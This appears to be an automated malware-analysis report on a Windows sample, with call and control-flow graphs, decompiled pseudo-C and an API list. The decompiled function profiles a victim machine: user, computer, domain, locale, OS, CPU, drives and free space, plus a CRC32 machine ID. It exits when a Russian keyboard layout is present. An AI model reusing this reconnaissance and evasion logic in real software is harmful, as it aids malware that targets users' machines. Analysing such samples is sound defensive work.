                                    callgraph 0 Function_0F142D10 1 Function_0F144E10 39 Function_0F149170 1->39 2 Function_0F147410 3 Function_0F148F06 4 Function_0F146500 5 Function_0F149200 6 Function_0F144B00 7 Function_0F144200 8 Function_0F145F00 35 Function_0F145E70 8->35 8->39 80 Function_0F145DC0 8->80 9 Function_0F143200 10 Function_0F148400 11 Function_0F143030 28 Function_0F142F50 11->28 12 Function_0F142D30 12->28 70 Function_0F1430A0 12->70 79 Function_0F142AD0 12->79 13 Function_0F142830 14 Function_0F149124 15 Function_0F145220 46 Function_0F145060 15->46 16 Function_0F144B20 16->4 16->6 16->7 16->12 27 Function_0F146550 16->27 38 Function_0F143C70 16->38 48 Function_0F145860 16->48 55 Function_0F1442B0 16->55 63 Function_0F1445B0 16->63 64 Function_0F143DB0 16->64 75 Function_0F1441D0 16->75 77 Function_0F1447D0 16->77 82 Function_0F1464C0 16->82 84 Function_0F1448C0 16->84 90 Function_0F143FF0 16->90 17 Function_0F148520 18 Function_0F141C20 19 Function_0F141020 20 Function_0F148B20 21 Function_0F143320 22 Function_0F146620 23 Function_0F148F2C 24 Function_0F148F54 25 Function_0F145350 26 Function_0F148050 32 Function_0F147E40 26->32 99 Function_0F1463E0 27->99 29 Function_0F142C50 30 Function_0F146D40 31 Function_0F146F40 93 Function_0F146DF0 31->93 33 Function_0F146B40 34 Function_0F149049 36 Function_0F147D70 37 Function_0F147B70 40 Function_0F145670 40->8 40->36 51 Function_0F147490 40->51 71 Function_0F1472A0 40->71 72 Function_0F1470A0 40->72 83 Function_0F143BC0 40->83 89 Function_0F1454F0 40->89 41 Function_0F148D71 42 Function_0F14377E 42->19 43 Function_0F144A78 44 Function_0F148260 45 Function_0F142960 61 Function_0F1482B0 45->61 46->1 58 Function_0F144FB0 46->58 47 Function_0F147B60 48->8 48->36 48->51 48->71 48->72 48->83 85 Function_0F1435C0 48->85 48->89 49 Function_0F146660 81 Function_0F1436C0 49->81 50 Function_0F146E69 59 Function_0F146AB0 50->59 50->93 51->2 51->37 62 Function_0F148AB0 51->62 92 Function_0F146FF0 51->92 52 Function_0F142890 52->10 52->11 52->13 53 Function_0F143190 54 Function_0F146780 91 Function_0F1481F0 54->91 55->36 55->51 55->71 55->72 55->83 55->91 56 Function_0F1437B0 56->4 56->10 56->17 56->20 56->49 78 Function_0F1436D0 56->78 57 Function_0F1432B0 69 Function_0F144EA0 58->69 95 Function_0F148AF0 58->95 59->56 60 Function_0F1469B0 59->60 94 Function_0F1468F0 59->94 96 Function_0F143CF0 63->96 64->38 64->96 65 Function_0F148FA4 66 Function_0F144DA5 66->22 67 Function_0F1443A6 67->36 67->91 68 Function_0F148FA6 70->28 73 Function_0F146BA0 73->33 73->44 74 Function_0F148DA8 75->22 75->90 101 Function_0F1465E0 75->101 76 Function_0F1453D0 76->8 76->15 76->25 76->26 76->32 76->76 100 Function_0F1433E0 76->100 77->36 77->51 77->71 77->72 77->83 78->19 79->45 79->52 79->61 79->91 80->39 97 Function_0F1434F0 85->97 86 Function_0F144DC0 87 Function_0F148DCC 88 Function_0F148ECE 89->15 89->26 89->32 89->76 90->40 92->26 92->32 93->30 93->54 93->59 93->73 93->93 96->39 98 Function_0F145FF0 102 Function_0F145FE0 98->102 100->9 100->21 100->53 100->57

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 f147490-f1474a7 1 f1474ce-f1474d2 0->1 2 f1474a9-f1474c8 VirtualAlloc GetUserNameW 0->2 3 f1474d4-f1474f0 VirtualAlloc GetComputerNameW 1->3 4 f1474f6-f147500 1->4 2->1 3->4 5 f147556-f14755a 4->5 6 f147502-f147517 VirtualAlloc 4->6 8 f1475f5-f1475f9 5->8 9 f147560-f14759a VirtualAlloc RegOpenKeyExW 5->9 6->5 7 f147519-f14752f call f147410 6->7 18 f147534-f147536 7->18 10 f1475ff-f14762d VirtualAlloc * 2 8->10 11 f1476f9-f1476fd 8->11 13 f14759c-f1475be RegQueryValueExW 9->13 14 f1475de-f1475ef VirtualFree 9->14 17 f147634-f147667 wsprintfW RegOpenKeyExW 10->17 15 f1476ff-f147728 VirtualAlloc call f147410 11->15 16 f14775b-f14775f 11->16 19 f1475c0-f1475c7 13->19 20 f1475c9 GetLastError 13->20 14->8 31 f14772d-f14772f 15->31 27 f147761-f147782 GetNativeSystemInfo VirtualAlloc 16->27 28 f1477ce-f1477d2 16->28 23 f1476c4-f1476c6 17->23 24 f147669-f147689 RegQueryValueExW 17->24 25 f147538-f14753f 18->25 26 f147549-f14754e 18->26 21 f1475cf-f1475dc RegCloseKey 19->21 20->21 21->8 21->14 38 f1476c9-f1476cc 23->38 32 f147694 GetLastError 24->32 33 f14768b-f147692 24->33 25->5 34 f147541-f147547 25->34 35 f147551-f147553 wsprintfW 26->35 36 f147784-f14778b 27->36 37 f1477c3 27->37 29 f1477d4-f1477e3 call f147b70 28->29 30 f1477ef-f1477f3 28->30 54 f1477e8-f1477ea 29->54 45 f147939 30->45 46 f1477f9-f147887 VirtualAlloc * 2 GetWindowsDirectoryW GetVolumeInformationW call f147410 30->46 31->16 43 f147731-f147758 call f147410 wsprintfW 31->43 44 f14769a-f1476a7 RegCloseKey 32->44 33->44 34->35 35->5 36->37 47 f1477b5-f1477ba 36->47 48 f1477a7-f1477ac 36->48 49 f147792-f1477a1 wsprintfW ExitProcess 36->49 50 f1477bc-f1477c1 36->50 51 f1477ae-f1477b3 36->51 41 f1477c8-f1477cb wsprintfW 37->41 39 f1476d6-f1476f3 wsprintfW VirtualFree 38->39 40 f1476ce-f1476d0 38->40 39->11 40->17 40->39 41->28 43->16 44->23 55 f1476a9-f1476b9 44->55 52 f14793f-f147943 45->52 66 f147889-f1478b5 lstrlenW call f147410 46->66 67 f1478ba-f1478fb wsprintfW lstrcatW GetModuleHandleW GetProcAddress 46->67 47->41 48->41 50->41 51->41 57 f147af2-f147af9 52->57 58 f147949-f147999 VirtualAlloc 52->58 54->30 59 f1477ec 54->59 55->49 71 f1476bf-f1476c2 55->71 63 f147b40-f147b4b 57->63 64 f147afb-f147b17 VirtualAlloc 57->64 62 f1479a0-f1479ab 58->62 59->30 62->62 70 f1479ad-f1479bf 62->70 68 f147b36 64->68 69 f147b19-f147b22 call f146ff0 64->69 66->67 73 f1478fd-f147917 lstrlenW 67->73 74 f147919 67->74 68->63 69->63 84 f147b24-f147b30 VirtualFree 69->84 76 f1479c2-f1479da GetDriveTypeW 70->76 71->38 75 f147920-f147937 VirtualFree 73->75 74->75 75->52 80 f1479e0-f1479e3 76->80 81 f147acd 76->81 80->81 82 f1479e9-f147a30 lstrcatW * 3 GetDiskFreeSpaceW 80->82 83 f147ad3-f147add 81->83 86 f147a36-f147ac1 call f148ab0 * 2 lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 82->86 87 f147ac3-f147acb lstrcatW 82->87 83->76 85 f147ae3-f147aed lstrlenW 83->85 84->68 85->57 86->83 87->81
                                    C-Code - Quality: 88%
                                    			E0F147490(DWORD* __ecx, void* __edx) {
                                    				void* _v8;
                                    				void* _v12;
                                    				long _v16;
                                    				long _v20;
                                    				int _v24;
                                    				int _v28;
                                    				intOrPtr _v32;
                                    				short _v36;
                                    				short _v40;
                                    				WCHAR* _v44;
                                    				WCHAR* _v48;
                                    				WCHAR* _v52;
                                    				WCHAR* _v56;
                                    				WCHAR* _v60;
                                    				WCHAR* _v64;
                                    				WCHAR* _v68;
                                    				signed short _v76;
                                    				char _v132;
                                    				void* _t154;
                                    				long _t155;
                                    				WCHAR* _t157;
                                    				short _t158;
                                    				short _t159;
                                    				short _t160;
                                    				signed int _t161;
                                    				signed int _t164;
                                    				signed int _t166;
                                    				int _t178;
                                    				void* _t181;
                                    				signed int _t183;
                                    				signed int _t186;
                                    				WCHAR* _t190;
                                    				void* _t191;
                                    				void* _t199;
                                    				_Unknown_base(*)()* _t204;
                                    				signed int _t211;
                                    				intOrPtr _t216;
                                    				WCHAR* _t218;
                                    				WCHAR* _t220;
                                    				void* _t221;
                                    				void* _t224;
                                    				WCHAR* _t226;
                                    				long _t229;
                                    				int _t230;
                                    				long _t234;
                                    				void* _t238;
                                    				long _t240;
                                    				long _t243;
                                    				WCHAR* _t246;
                                    				void* _t247;
                                    				WCHAR* _t249;
                                    				WCHAR* _t250;
                                    				WCHAR* _t252;
                                    				void* _t256;
                                    				DWORD* _t260;
                                    				short* _t261;
                                    				DWORD* _t266;
                                    				void* _t267;
                                    				signed int _t270;
                                    				void* _t274;
                                    				void* _t276;
                                    				void* _t277;
                                    				DWORD* _t279;
                                    				void* _t280;
                                    				void* _t281;
                                    
                                    				_t267 = __edx;
                                    				_t260 = __ecx;
                                    				_t279 = __ecx;
                                    				if( *__ecx != 0) {
                                    					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
                                    					_t260 =  &_v24;
                                    					 *(_t279 + 8) = _t252;
                                    					_v24 = 0x100;
                                    					GetUserNameW(_t252, _t260); // executed
                                    				}
                                    				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
                                    					_v24 = 0x1e;
                                    					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
                                    					_t260 =  &_v24;
                                    					 *(_t279 + 0x14) = _t250;
                                    					GetComputerNameW(_t250, _t260);
                                    				}
                                    				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
                                    					L11:
                                    					if( *(_t279 + 0x30) == 0) {
                                    						L18:
                                    						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
                                    							L31:
                                    							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
                                    								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
                                    								_push(_t260);
                                    								 *(_t279 + 0x50) = _t220;
                                    								_t221 = E0F147410(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80); // executed
                                    								if(_t221 == 0) {
                                    									_push(_t260);
                                    									E0F147410(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
                                    									wsprintfW( *(_t279 + 0x50), L"error");
                                    									_t281 = _t281 + 8;
                                    								}
                                    							}
                                    							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
                                    								L44:
                                    								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
                                    									_v28 = 0;
                                    									_t216 = E0F147B70(_t279 + 0x2c,  &_v28); // executed
                                    									if(_t216 == 0) {
                                    										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
                                    									}
                                    								}
                                    								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
                                    									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                    									 *(_t279 + 0x68) = _t190;
                                    									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
                                    									_t276 = _t191;
                                    									GetWindowsDirectoryW(_t276, 0x100);
                                    									_t66 = _t276 + 0x600; // 0x600
                                    									_t266 = _t66;
                                    									 *((short*)(_t276 + 6)) = 0;
                                    									_t68 = _t276 + 0x400; // 0x400
                                    									_t69 = _t276 + 0x604; // 0x604
                                    									_t70 = _t276 + 0x608; // 0x608
                                    									_t71 = _t276 + 0x200; // 0x200
                                    									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
                                    									_push(_t266);
                                    									_t72 = _t276 + 0x60c; // 0x60c
                                    									_t260 = _t72;
                                    									_t199 = E0F147410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
                                    									if(_t199 != 0) {
                                    										_t73 = _t276 + 0x60c; // 0x60c
                                    										_t211 = lstrlenW(_t73);
                                    										_t74 = _t276 + 0x60c; // 0x60c
                                    										_t260 = _t74;
                                    										_push(_t260);
                                    										E0F147410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
                                    									}
                                    									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
                                    									_t79 = _t276 + 0x60c; // 0x60c
                                    									_t281 = _t281 + 0xc;
                                    									lstrcatW( *(_t279 + 0x68), _t79);
                                    									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
                                    									_v28 = _t204;
                                    									if(_t204 == 0) {
                                    										 *(_t279 + 0x6c) = 0;
                                    									} else {
                                    										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
                                    									}
                                    									 *(_t279 + 0x70) =  *(_t276 + 0x600);
                                    									VirtualFree(_t276, 0, 0x8000); // executed
                                    								}
                                    								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
                                    									L67:
                                    									if( *(_t279 + 0x80) == 0) {
                                    										L72:
                                    										return 1;
                                    									}
                                    									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
                                    									 *(_t279 + 0x84) = _t154;
                                    									if(_t154 == 0) {
                                    										L71:
                                    										 *(_t279 + 0x80) = 0;
                                    										goto L72;
                                    									}
                                    									_push(_t260);
                                    									_t155 = E0F146FF0(_t154); // executed
                                    									if(_t155 != 0) {
                                    										goto L72;
                                    									}
                                    									VirtualFree( *(_t279 + 0x84), _t155, 0x8000); // executed
                                    									goto L71;
                                    								} else {
                                    									_v68 = L"UNKNOWN";
                                    									_v64 = L"NO_ROOT_DIR";
                                    									_v60 = L"REMOVABLE";
                                    									_v56 = L"FIXED";
                                    									_v52 = L"REMOTE";
                                    									_v48 = L"CDROM";
                                    									_v44 = L"RAMDISK";
                                    									_t157 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                    									 *(_t279 + 0x7c) = _t157;
                                    									_t261 =  &_v132;
                                    									_t158 = 0x41;
                                    									do {
                                    										 *_t261 = _t158;
                                    										_t261 = _t261 + 2;
                                    										_t158 = _t158 + 1;
                                    									} while (_t158 <= 0x5a);
                                    									_t159 =  *L"?:\\"; // 0x3a003f
                                    									_v40 = _t159;
                                    									_t160 =  *0xf14f350; // 0x5c
                                    									_v36 = _t160;
                                    									_t161 = 0;
                                    									_v24 = 0;
                                    									do {
                                    										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
                                    										_t164 = GetDriveTypeW( &_v40); // executed
                                    										_t270 = _t164;
                                    										if(_t270 > 2 && _t270 != 5) {
                                    											_v36 = 0;
                                    											lstrcatW( *(_t279 + 0x7c),  &_v40);
                                    											_v36 = 0x5c;
                                    											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
                                    											lstrcatW( *(_t279 + 0x7c), "_");
                                    											_t178 = GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16); // executed
                                    											if(_t178 == 0) {
                                    												lstrcatW( *(_t279 + 0x7c), L"0,");
                                    												goto L64;
                                    											}
                                    											_v8 = E0F148AB0(_v16, 0, _v28 * _v20, 0);
                                    											_t256 = _t267;
                                    											_t181 = E0F148AB0(_v12, 0, _v28 * _v20, 0);
                                    											_t274 = _v8;
                                    											_v32 = _t274 - _t181;
                                    											asm("sbb eax, edx");
                                    											_v8 = _t256;
                                    											_t183 = lstrlenW( *(_t279 + 0x7c));
                                    											_push(_t256);
                                    											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
                                    											_t186 = lstrlenW( *(_t279 + 0x7c));
                                    											_push(_v8);
                                    											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
                                    											_t281 = _t281 + 0x20;
                                    											lstrcatW( *(_t279 + 0x7c), ",");
                                    										}
                                    										_t161 = _v24 + 1;
                                    										_v24 = _t161;
                                    									} while (_t161 < 0x1b);
                                    									_t166 = lstrlenW( *(_t279 + 0x7c));
                                    									_t260 =  *(_t279 + 0x7c);
                                    									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
                                    									goto L67;
                                    								}
                                    							} else {
                                    								__imp__GetNativeSystemInfo( &_v76); // executed
                                    								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
                                    								_t260 = _v76 & 0x0000ffff;
                                    								 *(_t279 + 0x5c) = _t218;
                                    								if(_t260 > 9) {
                                    									L42:
                                    									_push(L"Unknown");
                                    									L43:
                                    									wsprintfW(_t218, ??);
                                    									_t281 = _t281 + 8;
                                    									goto L44;
                                    								}
                                    								_t260 =  *(_t260 + E0F147B60) & 0x000000ff;
                                    								switch( *((intOrPtr*)(_t260 * 4 +  &M0F147B4C))) {
                                    									case 0:
                                    										_push(L"x86");
                                    										goto L43;
                                    									case 1:
                                    										_push(L"ARM");
                                    										goto L43;
                                    									case 2:
                                    										_push(L"Itanium");
                                    										goto L43;
                                    									case 3:
                                    										_push(L"x64");
                                    										goto L43;
                                    									case 4:
                                    										goto L42;
                                    								}
                                    							}
                                    						}
                                    						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
                                    						_v8 = _t224;
                                    						_v20 = _t224 + 0xe;
                                    						_t226 = VirtualAlloc(0, 4, 0x3000, 4); // executed
                                    						 *(_t279 + 0x44) = _t226;
                                    						_t277 = 1;
                                    						_v24 = 1;
                                    						do {
                                    							wsprintfW(_v8, L"%d", _t277);
                                    							_t281 = _t281 + 0xc;
                                    							_v16 = 0;
                                    							_t277 = _t277 + 1;
                                    							_t229 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12); // executed
                                    							if(_t229 != 0) {
                                    								L27:
                                    								_t230 = 0;
                                    								_v24 = 0;
                                    								goto L28;
                                    							}
                                    							_v28 = 0x80;
                                    							_t234 = RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28); // executed
                                    							if(_t234 != 0) {
                                    								GetLastError();
                                    							} else {
                                    								_v16 = 1;
                                    							}
                                    							RegCloseKey(_v12); // executed
                                    							if(_v16 == 0) {
                                    								goto L27;
                                    							} else {
                                    								if(lstrcmpiW(_v20, L"00000419") == 0) {
                                    									_t218 = wsprintfW( *(_t279 + 0x44), "1");
                                    									_t281 = _t281 + 8;
                                    									ExitProcess(0);
                                    								}
                                    								_t230 = _v24;
                                    							}
                                    							L28:
                                    						} while (_t277 != 9 && _t230 != 0);
                                    						wsprintfW( *(_t279 + 0x44), "0");
                                    						_t281 = _t281 + 8;
                                    						VirtualFree(_v8, 0, 0x8000); // executed
                                    						goto L31;
                                    					}
                                    					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
                                    					_v20 = _t238;
                                    					 *(_t279 + 0x38) = _t238;
                                    					_v12 = 0;
                                    					_t240 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8); // executed
                                    					if(_t240 != 0) {
                                    						L17:
                                    						 *(_t279 + 0x30) = 0;
                                    						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
                                    						goto L18;
                                    					}
                                    					_v24 = 0x40;
                                    					_t243 = RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24); // executed
                                    					if(_t243 != 0) {
                                    						GetLastError();
                                    					} else {
                                    						_v12 = 1;
                                    					}
                                    					RegCloseKey(_v8); // executed
                                    					if(_v12 != 0) {
                                    						goto L18;
                                    					} else {
                                    						goto L17;
                                    					}
                                    				} else {
                                    					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
                                    					 *(_t279 + 0x20) = _t246;
                                    					if(_t246 == 0) {
                                    						goto L11;
                                    					}
                                    					_push(_t260);
                                    					_t247 = E0F147410(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
                                    					if(_t247 == 0) {
                                    						wsprintfW( *(_t279 + 0x20), L"undefined");
                                    						L10:
                                    						_t281 = _t281 + 8;
                                    						goto L11;
                                    					}
                                    					_t249 =  *(_t279 + 0x20);
                                    					if( *_t249 != 0) {
                                    						goto L11;
                                    					}
                                    					wsprintfW(_t249, L"WORKGROUP");
                                    					goto L10;
                                    				}
                                    			}




































































                                    0x0f147490
                                    0x0f147490
                                    0x0f14749b
                                    0x0f1474a7
                                    0x0f1474b7
                                    0x0f1474b9
                                    0x0f1474bc
                                    0x0f1474c1
                                    0x0f1474c8
                                    0x0f1474c8
                                    0x0f1474d2
                                    0x0f1474df
                                    0x0f1474e6
                                    0x0f1474e8
                                    0x0f1474eb
                                    0x0f1474f0
                                    0x0f1474f0
                                    0x0f147500
                                    0x0f147556
                                    0x0f14755a
                                    0x0f1475f5
                                    0x0f1475f9
                                    0x0f1476f9
                                    0x0f1476fd
                                    0x0f14770d
                                    0x0f14770f
                                    0x0f147725
                                    0x0f147728
                                    0x0f14772f
                                    0x0f147731
                                    0x0f147749
                                    0x0f147756
                                    0x0f147758
                                    0x0f147758
                                    0x0f14772f
                                    0x0f14775f
                                    0x0f1477ce
                                    0x0f1477d2
                                    0x0f1477d7
                                    0x0f1477e3
                                    0x0f1477ea
                                    0x0f1477ec
                                    0x0f1477ec
                                    0x0f1477ea
                                    0x0f1477f3
                                    0x0f147807
                                    0x0f147817
                                    0x0f14781a
                                    0x0f14781c
                                    0x0f147824
                                    0x0f14782c
                                    0x0f14782c
                                    0x0f147837
                                    0x0f14783b
                                    0x0f147842
                                    0x0f147849
                                    0x0f147856
                                    0x0f14785e
                                    0x0f147864
                                    0x0f14786a
                                    0x0f14786a
                                    0x0f147880
                                    0x0f147887
                                    0x0f147889
                                    0x0f147890
                                    0x0f147896
                                    0x0f147896
                                    0x0f14789c
                                    0x0f1478b5
                                    0x0f1478b5
                                    0x0f1478c8
                                    0x0f1478d0
                                    0x0f1478d6
                                    0x0f1478dd
                                    0x0f1478f0
                                    0x0f1478f6
                                    0x0f1478fb
                                    0x0f147919
                                    0x0f1478fd
                                    0x0f147914
                                    0x0f147914
                                    0x0f14792e
                                    0x0f147931
                                    0x0f147931
                                    0x0f147943
                                    0x0f147af2
                                    0x0f147af9
                                    0x0f147b42
                                    0x0f147b4b
                                    0x0f147b4b
                                    0x0f147b09
                                    0x0f147b0f
                                    0x0f147b17
                                    0x0f147b36
                                    0x0f147b36
                                    0x00000000
                                    0x0f147b36
                                    0x0f147b19
                                    0x0f147b1b
                                    0x0f147b22
                                    0x00000000
                                    0x00000000
                                    0x0f147b30
                                    0x00000000
                                    0x0f147949
                                    0x0f147957
                                    0x0f14795e
                                    0x0f147965
                                    0x0f14796c
                                    0x0f147973
                                    0x0f14797a
                                    0x0f147981
                                    0x0f147988
                                    0x0f14798e
                                    0x0f147991
                                    0x0f147994
                                    0x0f1479a0
                                    0x0f1479a0
                                    0x0f1479a3
                                    0x0f1479a6
                                    0x0f1479a7
                                    0x0f1479ad
                                    0x0f1479b2
                                    0x0f1479b5
                                    0x0f1479ba
                                    0x0f1479bd
                                    0x0f1479bf
                                    0x0f1479c2
                                    0x0f1479c7
                                    0x0f1479cf
                                    0x0f1479d5
                                    0x0f1479da
                                    0x0f1479eb
                                    0x0f1479f6
                                    0x0f147a04
                                    0x0f147a08
                                    0x0f147a12
                                    0x0f147a28
                                    0x0f147a30
                                    0x0f147acb
                                    0x00000000
                                    0x0f147acb
                                    0x0f147a52
                                    0x0f147a55
                                    0x0f147a57
                                    0x0f147a5c
                                    0x0f147a68
                                    0x0f147a6b
                                    0x0f147a6d
                                    0x0f147a70
                                    0x0f147a79
                                    0x0f147a8a
                                    0x0f147a98
                                    0x0f147a9a
                                    0x0f147aac
                                    0x0f147ab4
                                    0x0f147abf
                                    0x0f147abf
                                    0x0f147ad6
                                    0x0f147ad7
                                    0x0f147ada
                                    0x0f147ae6
                                    0x0f147ae8
                                    0x0f147aed
                                    0x00000000
                                    0x0f147aed
                                    0x0f147761
                                    0x0f147765
                                    0x0f147776
                                    0x0f147778
                                    0x0f14777c
                                    0x0f147782
                                    0x0f1477c3
                                    0x0f1477c3
                                    0x0f1477c8
                                    0x0f1477c9
                                    0x0f1477cb
                                    0x00000000
                                    0x0f1477cb
                                    0x0f147784
                                    0x0f14778b
                                    0x00000000
                                    0x0f1477bc
                                    0x00000000
                                    0x00000000
                                    0x0f1477ae
                                    0x00000000
                                    0x00000000
                                    0x0f1477b5
                                    0x00000000
                                    0x00000000
                                    0x0f1477a7
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f14778b
                                    0x0f14775f
                                    0x0f14760d
                                    0x0f147616
                                    0x0f147620
                                    0x0f147623
                                    0x0f147625
                                    0x0f147628
                                    0x0f14762d
                                    0x0f147634
                                    0x0f14763d
                                    0x0f14763f
                                    0x0f147642
                                    0x0f14764c
                                    0x0f14765f
                                    0x0f147667
                                    0x0f1476c4
                                    0x0f1476c4
                                    0x0f1476c6
                                    0x00000000
                                    0x0f1476c6
                                    0x0f14766c
                                    0x0f147681
                                    0x0f147689
                                    0x0f147694
                                    0x0f14768b
                                    0x0f14768b
                                    0x0f14768b
                                    0x0f14769d
                                    0x0f1476a7
                                    0x00000000
                                    0x0f1476a9
                                    0x0f1476b9
                                    0x0f14779a
                                    0x0f14779c
                                    0x0f1477a1
                                    0x0f1477a1
                                    0x0f1476bf
                                    0x0f1476bf
                                    0x0f1476c9
                                    0x0f1476c9
                                    0x0f1476de
                                    0x0f1476e0
                                    0x0f1476ed
                                    0x00000000
                                    0x0f1476f3
                                    0x0f14756e
                                    0x0f147570
                                    0x0f147573
                                    0x0f14758b
                                    0x0f147592
                                    0x0f14759a
                                    0x0f1475de
                                    0x0f1475e8
                                    0x0f1475ef
                                    0x00000000
                                    0x0f1475ef
                                    0x0f14759f
                                    0x0f1475b6
                                    0x0f1475be
                                    0x0f1475c9
                                    0x0f1475c0
                                    0x0f1475c0
                                    0x0f1475c0
                                    0x0f1475d2
                                    0x0f1475dc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f147502
                                    0x0f147510
                                    0x0f147512
                                    0x0f147517
                                    0x00000000
                                    0x00000000
                                    0x0f147519
                                    0x0f14752f
                                    0x0f147536
                                    0x0f147551
                                    0x0f147551
                                    0x0f147553
                                    0x00000000
                                    0x0f147553
                                    0x0f147538
                                    0x0f14753f
                                    0x00000000
                                    0x00000000
                                    0x0f147551
                                    0x00000000
                                    0x0f147551

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F1474B7
                                    • GetUserNameW.ADVAPI32(00000000,?), ref: 0F1474C8
                                    • VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F1474E6
                                    • GetComputerNameW.KERNEL32 ref: 0F1474F0
                                    • VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F147510
                                    • wsprintfW.USER32 ref: 0F147551
                                    • VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F14756E
                                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F147592
                                    • RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F144810,?), ref: 0F1475B6
                                    • GetLastError.KERNEL32 ref: 0F1475C9
                                    • RegCloseKey.KERNEL32(00000000), ref: 0F1475D2
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F1475EF
                                    • VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0F14760D
                                    • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F147623
                                    • wsprintfW.USER32 ref: 0F14763D
                                    • RegOpenKeyExW.KERNEL32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0F14765F
                                    • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,0F144810,?), ref: 0F147681
                                    • GetLastError.KERNEL32 ref: 0F147694
                                    • RegCloseKey.KERNEL32(?), ref: 0F14769D
                                    • lstrcmpiW.KERNEL32(0F144810,00000419), ref: 0F1476B1
                                    • wsprintfW.USER32 ref: 0F1476DE
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1476ED
                                    • VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0F14770D
                                    • wsprintfW.USER32 ref: 0F147756
                                    • GetNativeSystemInfo.KERNEL32(?), ref: 0F147765
                                    • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0F147776
                                    • wsprintfW.USER32 ref: 0F14779A
                                    • ExitProcess.KERNEL32 ref: 0F1477A1
                                    • wsprintfW.USER32 ref: 0F1477C9
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F147807
                                    • VirtualAlloc.KERNEL32(00000000,00000E0C,00003000,00000004), ref: 0F14781A
                                    • GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0F147824
                                    • GetVolumeInformationW.KERNEL32(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0F14785E
                                    • lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F147890
                                    • wsprintfW.USER32 ref: 0F1478C8
                                    • lstrcatW.KERNEL32(?,0000060C), ref: 0F1478DD
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0F1478E9
                                    • GetProcAddress.KERNEL32(00000000), ref: 0F1478F0
                                    • lstrlenW.KERNEL32(?), ref: 0F147900
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F147931
                                      • Part of subcall function 0F147B70: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0F147B8D
